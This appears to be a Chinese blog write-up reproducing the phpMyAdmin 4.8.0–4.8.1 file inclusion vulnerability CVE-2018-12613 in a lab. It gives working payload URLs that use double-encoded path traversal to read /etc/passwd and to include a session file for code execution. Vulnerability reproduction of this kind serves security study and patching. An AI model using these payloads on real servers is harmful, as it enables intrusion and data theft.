1. 程式人生 > >phpmyadmin 遠端檔案包含漏洞(CVE-2018-12613)

phpmyadmin 遠端檔案包含漏洞(CVE-2018-12613)

phpMyAdmin是一套開源的、基於Web的MySQL資料庫管理工具。其index.php中存在一處檔案包含邏輯,通過二次編碼即可繞過檢查,造成遠端檔案包含漏洞。

漏洞記錄

漏洞編號:CVE-2018-12613

受影響版本:phpMyAdmin 4.8.0和4.8.1受到影響。

利用條件:
攻擊者必須經過身份驗證,但在這些情況下除外:
(/libraries/config.default.php)

  • $ cfg [‘AllowArbitraryServer’] = true:攻擊者可以指定他/她已經控制的任何主機,並在phpMyAdmin上執行任意程式碼
  • $ cfg [‘ServerDefault’] = 0:這會繞過登入並在沒有任何身份驗證的情況下執行易受攻擊的程式碼
  • 漏洞分析
    https://blog.csdn.net/qq_33020901/article/details/80829269

漏洞利用

訪問下面的payload

http://192.168.1.15:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

可見/etc/passwd被讀取,說明檔案包含漏洞存在:
在這裡插入圖片描述
目前有幾種getshell的方法,有的是上傳sql檔案,然後包含mysql的sql檔案,有的是開啟general_log來完成getshell,現在使用今天這種操作。利用方式也比較簡單,可以執行一下SELECT ‘<?=phpinfo()?>’;,然後檢視自己的sessionid(cookiephpMyAdmin的值),然後包含session檔案即可:
在這裡插入圖片描述

http://192.168.1.15:8080/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_0452064cb94eaca79f085df69ffbb2c2

在這裡插入圖片描述

參考連結:在這裡插入圖片描述
https://blog.csdn.net/qq_33020901/article/details/80829269